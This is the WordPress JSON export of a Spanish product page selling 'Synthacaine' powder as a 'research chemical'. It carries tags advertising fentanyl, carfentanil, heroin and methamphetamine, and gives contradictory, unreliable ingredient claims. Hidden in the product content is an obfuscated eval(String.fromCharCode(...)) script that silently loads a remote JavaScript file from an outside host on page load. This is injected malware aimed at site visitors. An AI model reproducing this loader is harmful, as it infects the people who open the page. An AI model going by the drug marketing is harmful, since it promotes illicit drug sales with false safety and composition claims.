{"id":4011,"date":"2025-02-06T21:29:08","date_gmt":"2025-02-06T21:29:08","guid":{"rendered":"https:\/\/exoticchemicals.com\/?post_type=product&#038;p=4011"},"modified":"2026-04-12T00:21:33","modified_gmt":"2026-04-12T00:21:33","slug":"comprar-synthacaine-polvo","status":"publish","type":"product","link":"https:\/\/exoticchemicals.com\/es\/product\/buy-synthacaine-powder\/","title":{"rendered":"Comprar sintaca\u00edna en polvo"},"content":{"rendered":"<h1 style=\"text-align: center\">Comprar Synthacaine Polvo Online<\/h1>\n<p>Comprar Synthacaine Polvo ha tenido, en el pasado, una reputaci\u00f3n bastante mala en la industria de la investigaci\u00f3n, pero eso es en gran parte debido a la cantidad de empresas que venden muestras de muy baja calidad de la misma.<\/p>\n<p>Trabajamos en estrecha colaboraci\u00f3n con un reputado laboratorio para garantizar que todos nuestros productos de sintaca\u00edna tienen una pureza m\u00ednima del 98%. No revelamos la formulaci\u00f3n exacta de este producto porque es una mezcla patentada.<\/p>\n<p>Synthacaine Powder es una sorprendente mezcla de algunos de nuestros productos qu\u00edmicos de investigaci\u00f3n m\u00e1s vendidos. Contiene etil-hexedrona y lidoca\u00edna.<\/p>\n<div id=\"standard-info\">\n<p>Synthacaine Powder se vende para <a href=\"https:\/\/pubs.rsc.org\/en\/content\/articlelanding\/2015\/an\/c5an00858a#!divAbstract\">fines de investigaci\u00f3n<\/a> y no debe utilizarse para ning\u00fan otro fin, incluidos, entre otros, fines de diagn\u00f3stico in vivo, en alimentos, en medicamentos, en dispositivos medicinales y\/o en cosm\u00e9ticos para humanos y\/o animales.<\/p>\n<p>Antes de realizar el pedido, aseg\u00farese de que dispone del equipo adecuado para investigar con productos qu\u00edmicos y de que su zona de trabajo est\u00e1 bien ventilada.<\/p>\n<\/p><\/div>\n<h3>Utiliza<\/h3>\n<p>Es un producto qu\u00edmico de investigaci\u00f3n que contiene metopropamina, 2AI, lidoca\u00edna e Inositol. Este producto incluye dometoca\u00edna y confetaminas, lo que lo convierte en una sustancia altamente adictiva.<\/p>\n<p>La dometoca\u00edna es un anest\u00e9sico y un estimulante, mientras que la confetamina es un inhibidor del apetito. Este compuesto combina ambos para crear una sustancia qu\u00edmica \u00fatil para la investigaci\u00f3n que se est\u00e1 probando en laboratorios e instituciones educativas de todo el mundo.<\/p>\n<p>Se cree que la sintaca\u00edna tiene un cincuenta por ciento de potencia de coca\u00edna, pero no est\u00e1 disponible para el consumo humano. Este compuesto, que se presenta en forma de polvo, s\u00f3lo est\u00e1 disponible para fines de investigaci\u00f3n.<\/p>\n<h3>\u00bfD\u00f3nde se puede comprar Synthacaine en polvo?<\/h3>\n<p>Puro y de alta calidad de Synthacaine polvo es suministrado por nuestra tienda en l\u00ednea de drogas <strong>en todo el mundo<\/strong> y a un precio muy asequible a laboratorios, farmacias, centros de investigaci\u00f3n y particulares.<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/primarycaremedstore.com\/product\/buy-synthacaine-powder\/\">\u00a1\u00a1\u00a1COMPRAR AHORA!!!<\/a><\/p>\n<p>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/p>","protected":false},"excerpt":{"rendered":"<p><strong>Sintaca\u00edna en polvo<\/strong> es una sorprendente mezcla de algunos de nuestros productos qu\u00edmicos de investigaci\u00f3n m\u00e1s vendidos. Synthacaine contiene <strong>Etil-hexedrona<\/strong> y <strong>Lidoca\u00edna<\/strong>.<\/p>","protected":false},"featured_media":4035,"comment_status":"open","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[5540],"product_tag":[5037,5038,5039,548,5040,5042,5043,5044,5045,5046,5047,5048,5049,5050,5051,5052,5053,5054,5055,5056,5057,5058,5059,5060,5061,5062,5063,3364,5064,5065,5066,5067,5068,5069,5070,5071,5072,5073,5074,5084,5564,5565,5566,5101,5121,5122,5123,5124,5125,5126,5127,5128,5129,5130,5131,5132,5567,5568,5569,5570,5571,5572,5573,5574,5575,5576,4807,4808,5258,5259,5577,5578],"class_list":{"0":"post-4011","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-mdphp-hydrochloride-price-per-gram-research-chemical","7":"product_tag-buy-3-fma-hcl-powder-in-canada","8":"product_tag-buy-3-fpm-hcl-powder","9":"product_tag-buy-3-meo-pcp-hcl","10":"product_tag-buy-4-aco-dmt","11":"product_tag-buy-4-aco-det-powder","12":"product_tag-buy-4-cmc-crystal","13":"product_tag-buy-4-ho-met-powder","14":"product_tag-buy-4-ho-mipt-powder","15":"product_tag-buy-4-mmc-crystal-in-canada","16":"product_tag-buy-4-mpd-crystal","17":"product_tag-buy-5-meo-dalt-powder","18":"product_tag-buy-5-meo-dmt-powder","19":"product_tag-buy-5-meo-pyr-t","20":"product_tag-buy-6-apb-powder-in-canada","21":"product_tag-buy-ah-7921","22":"product_tag-buy-allylescaline-powder","23":"product_tag-buy-amphetamine-powder","24":"product_tag-buy-anadrol","25":"product_tag-buy-anavar-in-canada","26":"product_tag-buy-andractim","27":"product_tag-buy-ap-238","28":"product_tag-buy-aromasin-in-canada","29":"product_tag-buy-bk-mdma-crystal","30":"product_tag-buy-clomid","31":"product_tag-buy-cumyl","32":"product_tag-buy-dck-crystal","33":"product_tag-buy-deca-npp","34":"product_tag-buy-dianabol","35":"product_tag-buy-diclazepam-powder","36":"product_tag-buy-dpt-hcl-powder","37":"product_tag-buy-eg-018-powder-in-canada","38":"product_tag-buy-equipoise-a-e","39":"product_tag-buy-fentanyl-powder-in-canada","40":"product_tag-buy-fubinaca","41":"product_tag-buy-hmma-hcl","42":"product_tag-buy-jwh-018-powder","43":"product_tag-buy-mda-crystal","44":"product_tag-buy-mdma-crystal","45":"product_tag-buy-mdmb-in-canada","46":"product_tag-buy-psychedelic-shrooms","47":"product_tag-buy-synthacaine-powder","48":"product_tag-buy-synthacaine-powder-online","49":"product_tag-buy-synthacaine-powder-without-prescription","50":"product_tag-dmt-dmxe-powder-in-canada","51":"product_tag-order-3-ho-pcp-hcl-powder-online","52":"product_tag-order-3-mmc-hcl-crystal","53":"product_tag-order-4-ho-det-powder-online","54":"product_tag-order-5-mapb-online","55":"product_tag-order-5-meo-mipt-hcl-powder-online","56":"product_tag-order-alprazolam-powder-online","57":"product_tag-order-carfentanil-powder-online","58":"product_tag-order-clonazepam-powder-online","59":"product_tag-order-diacetylmorphine-heroin-online","60":"product_tag-order-fluonitazene-powder-online","61":"product_tag-order-ketamine-crystals-online","62":"product_tag-order-o-dsmt-powder-online","63":"product_tag-order-synthacaine-powder","64":"product_tag-synthacaine","65":"product_tag-synthacaine-powder","66":"product_tag-synthacaine-powder-canada","67":"product_tag-synthacaine-powder-cost","68":"product_tag-synthacaine-powder-europe","69":"product_tag-synthacaine-powder-near-me","70":"product_tag-synthacaine-powder-price","71":"product_tag-synthacaine-powder-usa","72":"product_tag-synthacaine-powder-without-prescription","73":"product_tag-where-to-buy-a-pvp-crystal-online","74":"product_tag-where-to-buy-flubromazolam-online","75":"product_tag-where-to-buy-mescaline-powder-online","76":"product_tag-where-to-buy-methamphetamine-ice-online","77":"product_tag-where-to-buy-synthacaine-powder","78":"product_tag-where-to-get-synthacaine-powder-online","79":"desktop-align-left","80":"tablet-align-left","81":"mobile-align-left","83":"first","84":"instock","85":"shipping-taxable","86":"purchasable","87":"product-type-variable"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Buy Synthacaine Powder -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/exoticchemicals.com\/es\/producto\/comprar-synthacaine-polvo\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Buy Synthacaine Powder -\" \/>\n<meta property=\"og:description\" content=\"Synthacaine Powder is an amazing blend of some of our best-selling research chemicals. Synthacaine contains Ethyl-hexedrone and Lidocaine.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/exoticchemicals.com\/es\/producto\/comprar-synthacaine-polvo\/\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-12T00:21:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"237\" \/>\n\t<meta property=\"og:image:height\" content=\"213\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-synthacaine-powder\\\/\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-synthacaine-powder\\\/\",\"name\":\"Buy Synthacaine Powder -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-synthacaine-powder\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-synthacaine-powder\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/Synthacaine-Powder.jpeg\",\"datePublished\":\"2025-02-06T21:29:08+00:00\",\"dateModified\":\"2026-04-12T00:21:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-synthacaine-powder\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-synthacaine-powder\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-synthacaine-powder\\\/#primaryimage\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/Synthacaine-Powder.jpeg\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/Synthacaine-Powder.jpeg\",\"width\":237,\"height\":213},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-synthacaine-powder\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/shop\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Buy Synthacaine Powder\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/\",\"name\":\"exotic chemicals\",\"description\":\"Buy MDPHP Hydrochloride\",\"publisher\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/exoticchemicals.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\",\"name\":\"wwalkershop@gmail.com\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"width\":500,\"height\":500,\"caption\":\"wwalkershop@gmail.com\"},\"logo\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\"},\"sameAs\":[\"http:\\\/\\\/exoticchemicals.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Comprar Synthacaine Polvo -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/exoticchemicals.com\/es\/producto\/comprar-synthacaine-polvo\/","og_locale":"es_ES","og_type":"article","og_title":"Buy Synthacaine Powder -","og_description":"Synthacaine Powder is an amazing blend of some of our best-selling research chemicals. Synthacaine contains Ethyl-hexedrone and Lidocaine.","og_url":"https:\/\/exoticchemicals.com\/es\/producto\/comprar-synthacaine-polvo\/","article_modified_time":"2026-04-12T00:21:33+00:00","og_image":[{"width":237,"height":213,"url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/exoticchemicals.com\/product\/buy-synthacaine-powder\/","url":"https:\/\/exoticchemicals.com\/product\/buy-synthacaine-powder\/","name":"Comprar Synthacaine Polvo -","isPartOf":{"@id":"https:\/\/exoticchemicals.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-synthacaine-powder\/#primaryimage"},"image":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-synthacaine-powder\/#primaryimage"},"thumbnailUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg","datePublished":"2025-02-06T21:29:08+00:00","dateModified":"2026-04-12T00:21:33+00:00","breadcrumb":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-synthacaine-powder\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/exoticchemicals.com\/product\/buy-synthacaine-powder\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/exoticchemicals.com\/product\/buy-synthacaine-powder\/#primaryimage","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg","width":237,"height":213},{"@type":"BreadcrumbList","@id":"https:\/\/exoticchemicals.com\/product\/buy-synthacaine-powder\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/exoticchemicals.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/exoticchemicals.com\/shop\/"},{"@type":"ListItem","position":3,"name":"Buy Synthacaine Powder"}]},{"@type":"WebSite","@id":"https:\/\/exoticchemicals.com\/#website","url":"https:\/\/exoticchemicals.com\/","name":"productos qu\u00edmicos ex\u00f3ticos","description":"Comprar clorhidrato de MDPHP","publisher":{"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/exoticchemicals.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":["Person","Organization"],"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7","name":"wwalkershop@gmail.com","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","width":500,"height":500,"caption":"wwalkershop@gmail.com"},"logo":{"@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png"},"sameAs":["http:\/\/exoticchemicals.com"]}]}},"uagb_featured_image_src":{"full":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg",237,213,false],"thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder-150x150.jpeg",150,150,true],"medium":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg",237,213,false],"medium_large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg",237,213,false],"large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg",237,213,false],"1536x1536":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg",237,213,false],"2048x2048":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg",237,213,false],"trp-custom-language-flag":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg",13,12,false],"woocommerce_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg",237,213,false],"woocommerce_single":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder.jpeg",237,213,false],"woocommerce_gallery_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Synthacaine-Powder-100x100.jpeg",100,100,true]},"uagb_author_info":{"display_name":"bossman","author_link":"https:\/\/exoticchemicals.com\/es\/author\/"},"uagb_comment_info":11,"uagb_excerpt":"Synthacaine Powder is an amazing blend of some of our best-selling research chemicals. Synthacaine contains Ethyl-hexedrone and Lidocaine.","_links":{"self":[{"href":"https:\/\/exoticchemicals.com\/es\/wp-json\/wp\/v2\/product\/4011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/exoticchemicals.com\/es\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/exoticchemicals.com\/es\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/es\/wp-json\/wp\/v2\/comments?post=4011"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/es\/wp-json\/wp\/v2\/media\/4035"}],"wp:attachment":[{"href":"https:\/\/exoticchemicals.com\/es\/wp-json\/wp\/v2\/media?parent=4011"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/exoticchemicals.com\/es\/wp-json\/wp\/v2\/product_brand?post=4011"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/exoticchemicals.com\/es\/wp-json\/wp\/v2\/product_cat?post=4011"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/exoticchemicals.com\/es\/wp-json\/wp\/v2\/product_tag?post=4011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}